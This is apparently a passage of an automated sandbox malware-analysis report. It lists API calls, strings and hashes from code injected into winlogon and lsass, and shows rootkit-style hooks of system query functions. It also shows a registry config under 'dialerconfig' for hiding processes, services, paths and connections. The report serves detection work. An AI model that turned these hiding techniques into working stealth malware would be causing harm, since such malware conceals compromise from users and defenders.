                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 9E619B33600B858AEB65DFA5E0403ED77A1F394BE8F044226EF6957B98DB38D295C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: 72e056ba0e2456e91081c2497b6582406c8d111315e180d16f48c373d1f09fb1
                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: 8C51D63220438382EEA69B69A1643FA9651F3E57E0F440235FEA903BCDCA3DCF048744
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: 7545201565cffb4dd9c12d3e017e1e4cb621b9b8cbb6a5680d551cdf74df0a63
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: F241BF32214A8182DBA28F65E8443F9A7A0F7A87E4F904231EE5D87788EB7CC641C740
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: 7feea5767932b83702a4603a4908a0b46db3a5e551aabef06720e3f0f0bcf91d
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: DB113036214B4182EB618F15F4403A977E5F798BA4F584225EE9C07798DF3CCA51C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: 27eb8d332144c49fc42977003a1dd22787e74c1ec773337d6b22f03e146d9e6f
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: 2DE08671641B4990DF038F21E8402E837A1DBA8BB4F589232AD6C0A395FB3CD3E9C701
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction ID: cbed634acb7f4e420854ae58bba93560634c5ebebd018ce6374671fac8fe3439
                                                                      • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                      • Instruction Fuzzy Hash: 95E0807264074591DF014F61D4402E47360D798774B449231AD5C46355F63CD2E9C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575121677.000001F385B90000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385B90000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385b90000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: 9cfed72d77cccaa36cf3e22940643e972630171375edc54bb3644584a963761a
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: E6E08671601B4990DF038F21E4401E87761E7A8BA4F989232ED5C0A395FB3CD3E5C300
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575560099.000001F385BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F385BF0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bf0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction ID: e5f91ae01f9c44b97bbe6ed0de8d9856cd4c38cc7e306267f4dcf56f001a539c
                                                                      • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                      • Instruction Fuzzy Hash: 1AE08672600B4581DF028F61D4402E87360E7A8BB4B889232EE5C46355EA3CD2E9C700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 61c98598d725439005a8348cc94fee34ff644915bea9077b60c4904ec0b0c66d
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: E1119D35601B4681EE86CF66A4042BA63A0FBD9FE0F584234FE5D577A9DE3CC9428300
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000001F.00000002.2575301154.000001F385BC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F385BC0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_31_2_1f385bc0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction ID: feab5681243c9ea3ef05db4ea452e02591ff6f6f4dae11f5b3763983b80706bc
                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                      • Instruction Fuzzy Hash: F8E0ED3160160182EB458FA2D8083AA36E0FBE9FA2F84C024DD1807394DF3C8188C750

                                                                      Execution Graph

                                                                      Execution Coverage: 0.9%
                                                                      Dynamic/Decrypted Code Coverage: 0%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 119
                                                                      Total number of Limit Nodes: 10
                                                                      execution_graph 14651 2a29199253c 14653 2a2919925bb 14651->14653 14652 2a2919927aa 14653->14652 14654 2a29199261d GetFileType 14653->14654 14655 2a29199262b StrCpyW 14654->14655 14656 2a291992641 14654->14656 14657 2a291992650 14655->14657 14667 2a291991a40 GetFinalPathNameByHandleW 14656->14667 14661 2a29199265a 14657->14661 14664 2a2919926ff 14657->14664 14660 2a291993844 StrCmpNIW 14660->14664 14661->14652 14672 2a291993844 14661->14672 14675 2a291993044 StrCmpIW 14661->14675 14679 2a291991cac 14661->14679 14664->14652 14664->14660 14665 2a291993044 4 API calls 14664->14665 14666 2a291991cac 2 API calls 14664->14666 14665->14664 14666->14664 14668 2a291991a6a StrCmpNIW 14667->14668 14669 2a291991aa9 14667->14669 14668->14669 14670 2a291991a84 lstrlenW 14668->14670 14669->14657 14670->14669 14671 2a291991a96 StrCpyW 14670->14671 14671->14669 14673 2a291993851 StrCmpNIW 14672->14673 14674 2a291993866 14672->14674 14673->14674 14674->14661 14676 2a29199308d PathCombineW 14675->14676 14677 2a291993076 StrCpyW StrCatW 14675->14677 14678 2a291993096 14676->14678 14677->14678 14678->14661 14680 2a291991cc3 14679->14680 14681 2a291991ccc 14679->14681 14683 2a29199152c 14680->14683 14681->14661 14684 2a29199157c 14683->14684 14685 2a291991546 14683->14685 14684->14681 14685->14684 14686 2a29199155d StrCmpIW 14685->14686 14687 2a291991565 StrCmpW 14685->14687 14686->14685 14687->14685 14688 2a291991abc 14693 2a291991628 GetProcessHeap HeapAlloc 14688->14693 14690 2a291991ad2 Sleep SleepEx 14691 2a291991acb 14690->14691 14691->14690 14692 2a291991598 StrCmpIW StrCmpW 14691->14692 14692->14691 14737 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14693->14737 14695 2a291991650 14738 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14695->14738 14697 2a291991661 14739 2a291991268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14697->14739 14699 2a29199166a 14740 2a291991268 
GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14699->14740 14701 2a291991673 14702 2a29199168e RegOpenKeyExW 14701->14702 14703 2a2919916c0 RegOpenKeyExW 14702->14703 14704 2a2919918a6 14702->14704 14705 2a2919916ff RegOpenKeyExW 14703->14705 14706 2a2919916e9 14703->14706 14704->14691 14707 2a29199173a RegOpenKeyExW 14705->14707 14708 2a291991723 14705->14708 14741 2a2919912bc RegQueryInfoKeyW 14706->14741 14712 2a29199175e 14707->14712 14713 2a291991775 RegOpenKeyExW 14707->14713 14750 2a29199104c RegQueryInfoKeyW 14708->14750 14715 2a2919912bc 16 API calls 14712->14715 14716 2a2919917b0 RegOpenKeyExW 14713->14716 14717 2a291991799 14713->14717 14718 2a29199176b RegCloseKey 14715->14718 14720 2a2919917eb RegOpenKeyExW 14716->14720 14721 2a2919917d4 14716->14721 14719 2a2919912bc 16 API calls 14717->14719 14718->14713 14724 2a2919917a6 RegCloseKey 14719->14724 14722 2a29199180f 14720->14722 14723 2a291991826 RegOpenKeyExW 14720->14723 14725 2a2919912bc 16 API calls 14721->14725 14727 2a29199104c 6 API calls 14722->14727 14728 2a29199184a 14723->14728 14729 2a291991861 RegOpenKeyExW 14723->14729 14724->14716 14726 2a2919917e1 RegCloseKey 14725->14726 14726->14720 14730 2a29199181c RegCloseKey 14727->14730 14731 2a29199104c 6 API calls 14728->14731 14732 2a29199189c RegCloseKey 14729->14732 14733 2a291991885 14729->14733 14730->14723 14734 2a291991857 RegCloseKey 14731->14734 14732->14704 14735 2a29199104c 6 API calls 14733->14735 14734->14729 14736 2a291991892 RegCloseKey 14735->14736 14736->14732 14737->14695 14738->14697 14739->14699 14740->14701 14742 2a29199148a RegCloseKey 14741->14742 14743 2a291991327 GetProcessHeap HeapAlloc 14741->14743 14742->14705 14744 2a291991352 RegEnumValueW 14743->14744 14745 2a291991476 GetProcessHeap HeapFree 14743->14745 14746 2a2919913a5 14744->14746 14745->14742 14746->14744 14746->14745 14747 2a29199152c 2 API calls 14746->14747 14748 2a29199141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14746->14748 14749 2a2919913d3 
GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14746->14749 14747->14746 14748->14746 14749->14748 14751 2a2919911b5 RegCloseKey 14750->14751 14754 2a2919910bf 14750->14754 14751->14707 14752 2a2919910cf RegEnumValueW 14752->14754 14753 2a29199114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14753->14754 14754->14751 14754->14752 14754->14753 14755 2a29199202c 14756 2a29199205d 14755->14756 14757 2a291992173 14756->14757 14764 2a291992081 14756->14764 14768 2a29199213e 14756->14768 14758 2a2919921e7 14757->14758 14759 2a291992178 14757->14759 14761 2a2919921ec 14758->14761 14758->14768 14776 2a291992f04 GetProcessHeap HeapAlloc 14759->14776 14763 2a291992f04 11 API calls 14761->14763 14762 2a2919920b9 StrCmpNIW 14762->14764 14766 2a291992190 14763->14766 14764->14762 14765 2a2919920e0 14764->14765 14764->14768 14765->14764 14769 2a291991bf4 14765->14769 14766->14766 14766->14768 14770 2a291991c1b GetProcessHeap HeapAlloc 14769->14770 14771 2a291991c8f 14769->14771 14770->14771 14772 2a291991c56 14770->14772 14771->14765 14773 2a291991c77 GetProcessHeap HeapFree 14772->14773 14774 2a29199152c 2 API calls 14772->14774 14773->14771 14775 2a291991c6e 14774->14775 14775->14773 14780 2a291992f57 14776->14780 14777 2a291993015 GetProcessHeap HeapFree 14777->14766 14778 2a291993010 14778->14777 14779 2a291992fa2 StrCmpNIW 14779->14780 14780->14777 14780->14778 14780->14779 14781 2a291991bf4 6 API calls 14780->14781 14781->14780 14782 2a2911c273c 14785 2a2911c276a 14782->14785 14783 2a2911c2858 LoadLibraryA 14783->14785 14784 2a2911c28d4 14785->14783 14785->14784

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: b60ce313c48d00840e0b1213c085003e09fb0053b976659188ccf0f46ed53324
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: B0717F263007A2C7F6A99E2BDA483AF6694F38EF84F640026DD0953B8DDF35D64D8741

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: S$dialer
                                                                      • API String ID: 756756679-3873981283
                                                                      • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                      • Instruction ID: 31f48a6878fe19fac89be96b3cc806bef6c18fe058c887360822b4faed0dbcc7
                                                                      • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                      • Instruction Fuzzy Hash: BC519F76B10636C7FBADCB2BEA4866E63A5F70AB94F249011DE0512B49DF35C85DC301

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: a357d2d52508768e3afd4e1e04428e6709925dc5c1eedb762baf769dbdce5509
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: 04F03622304652D3FBA08B2AFA8875A6761F75DF98FE44020DA4946598DE6CC64DCB01

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0
                                                                      • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction ID: 58e4f2d2b6d44b688d357d41d78580bd9e8a4ecd447c4753187665df867a6417
                                                                      • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                      • Instruction Fuzzy Hash: E4115E30750663C3F7E09F7BFB4E35B2294A79EF45FB04128991A41699EF78D28C8212

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 000002A291991628: GetProcessHeap.KERNEL32 ref: 000002A291991633
                                                                        • Part of subcall function 000002A291991628: HeapAlloc.KERNEL32 ref: 000002A291991642
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919916B2
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919916DF
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919916F9
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991719
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991734
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991754
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A29199176F
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A29199178F
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919917AA
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A2919917CA
                                                                      • Sleep.KERNEL32 ref: 000002A291991AD7
                                                                      • SleepEx.KERNELBASE ref: 000002A291991ADD
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919917E5
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991805
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991820
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A291991840
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A29199185B
                                                                        • Part of subcall function 000002A291991628: RegOpenKeyExW.ADVAPI32 ref: 000002A29199187B
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A291991896
                                                                        • Part of subcall function 000002A291991628: RegCloseKey.ADVAPI32 ref: 000002A2919918A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: 3c2d3c73657fef33275c25727780f265ec2bd7433f006fbc608fa0bc8dfbb08e
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 2231ED61700662C3FBD09B2BD74936B13A5BB4EFE9F2854318E0B8729DEE14C45D8212

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: b4be3b6af767c20a18f202599a4ffb0d2b1a842901df5322d96555700405c82d
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: B4610532B016B2D7DBA4CF1A900476E7392F755FA4F688121DE5907788EF38D85AE702

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 043e66a94291c1a102d958949189fb88a9b9732a4a50de77dbbc8e9e83f4211b
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 76B1A022311A62C3FBD88F6AD6487AA63A4F74AF84F645016EE0957798DF35CC4CC341
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: 44736799373c9efb6451b95b64b9a47d87deab4c0848c0c6155269827a27a6b7
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: 7C314C72305B91CAFBA49F65E8443EE7360F789B44F54402ADA4D47A98EF38C64CCB10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: c9b0c7b1d200b93522009db0479c6571555f4cb46859bdbeb309bed3194aa6ce
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: 50316332314B91C6EBA0CF2AE94439E73A4F78AB54F600115EA9D43B98DF38C54DCB01

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 106492572-2879589442
                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction ID: 265f4212d38ea3b3e46c55dae75a9839ab9f88983801d7ae21ce8a3aa47b5e51
                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction Fuzzy Hash: E171EA26310A22C7FB909F6BE95869E23B4F78AF9CF511121D94E47BA9DE34C48CC741

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: 188830453a345198aa7934d318025cb7fa0c86e460bd2f7c13c811caed25026c
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: C9513636200B95C7EB94CF6AE64835BBBA1F78EF99F644124DA4A07758DF38D04D8B01

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: 72976cce3cdeaaa03b07112629cfa60ab1e39ff48f18b917d1b00f2fb3e72a4e
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: 6631A96470196BE3FB85EBAFEA596D62360F71EF54FE04423940A061A9DF38824DC352

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
